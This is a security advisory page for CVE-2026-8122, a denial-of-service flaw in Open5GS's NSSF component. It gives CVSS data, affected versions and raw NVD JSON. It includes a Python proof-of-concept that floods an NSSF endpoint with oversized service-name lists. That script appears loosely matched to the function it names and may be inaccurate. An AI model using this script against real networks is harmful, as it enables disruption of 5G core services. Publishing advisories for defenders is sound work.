Security Vulnerability Report
CVE-2026-8122 CVSS 4.3 MEDIUM

CVE-2026-8122

Published: 2026-05-08 01:16:10
Last Modified: 2026-05-11 14:00:26

Description

A vulnerability was found in Open5GS up to 2.7.7. This affects the function ogs_sbi_discovery_option_add_service_names in the library /lib/sbi/message.c of the component NSSF. The manipulation results in denial of service. The attack can be performed remotely. The exploit has been made public and could be used. The project was informed of the problem early through an issue report but has not responded yet.

CVSS Details

CVSS Score: 4.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:open5gs:open5gs:*:*:*:*:*:*:*:* - VULNERABLE
Open5GS <= 2.7.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import json

# Target configuration
# Open5GS NSSF typically listens on port 8000 (or configured SBI port)
target_host = "<TARGET_IP>"
target_port = "8000"
url = f"http://{target_host}:{target_port}/nssf-nssf/v1/nsi-management"

# Helper to create malicious payload targeting the vulnerable function
# The vulnerability involves ogs_sbi_discovery_option_add_service_names
# We send a large number of service names to induce parsing stress/crash
def generate_malicious_payload():
    payloads = []
    # Case 1: Extremely long service name
    payloads.append({"nrfId": "http://localhost", "serviceNames": ["A" * 10000]})
    # Case 2: Massive array of service names
    payloads.append({"nrfId": "http://localhost", "serviceNames": ["svc-{}".format(i) for i in range(10000)]})
    return payloads

print(f"[*] Attempting to trigger DoS on {target_host}...")
for payload in generate_malicious_payload():
    try:
        headers = {'Content-Type': 'application/json', 'Accept': 'application/json'}
        response = requests.post(url, data=json.dumps(payload), headers=headers, timeout=5)
        print(f"Status: {response.status_code}")
    except requests.exceptions.Timeout:
        print("[+] Potential DoS triggered (Server Timeout)")
    except requests.exceptions.ConnectionError:
        print("[+] Potential DoS triggered (Connection Refused/Dropped)")
    except Exception as e:
        print(f"Error: {e}")

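References

https://github.com/open5gs/open5gs/ (Product)
https://github.com/open5gs/open5gs/issues/4435 (Exploit, Issue Tracking)
https://vuldb.com/submit/808425 (Third Party Advisory, VDB Entry, Exploit)
https://vuldb.com/vuln/361909 (Third Party Advisory, VDB Entry)
https://vuldb.com/vuln/361909/cti (Permissions Required, VDB Entry)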

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-8122", "sourceIdentifier": "[email protected]", "published": "2026-05-08T01:16:10.053", "lastModified": "2026-05-11T14:00:25.753", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was found in Open5GS up to 2.7.7. This affects the function ogs_sbi_discovery_option_add_service_names in the library /lib/sbi/message.c of the component NSSF. The manipulation results in denial of service. The attack may be performed from remote. The exploit has been made public and could be used. The project was informed of the problem early through an issue report but has not responded yet."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": 
"NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "baseScore": 4.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-404"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:open5gs:open5gs:*:*:*:*:*:*:*:*", 
"versionEndIncluding": "2.7.7", "matchCriteriaId": "0A46BC99-08E7-4D40-A908-76121E4AFCD5"}]}]}], "references": [{"url": "https://github.com/open5gs/open5gs/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/open5gs/open5gs/issues/4435", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}, {"url": "https://vuldb.com/submit/808425", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry", "Exploit"]}, {"url": "https://vuldb.com/vuln/361909", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/vuln/361909/cti", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}]}}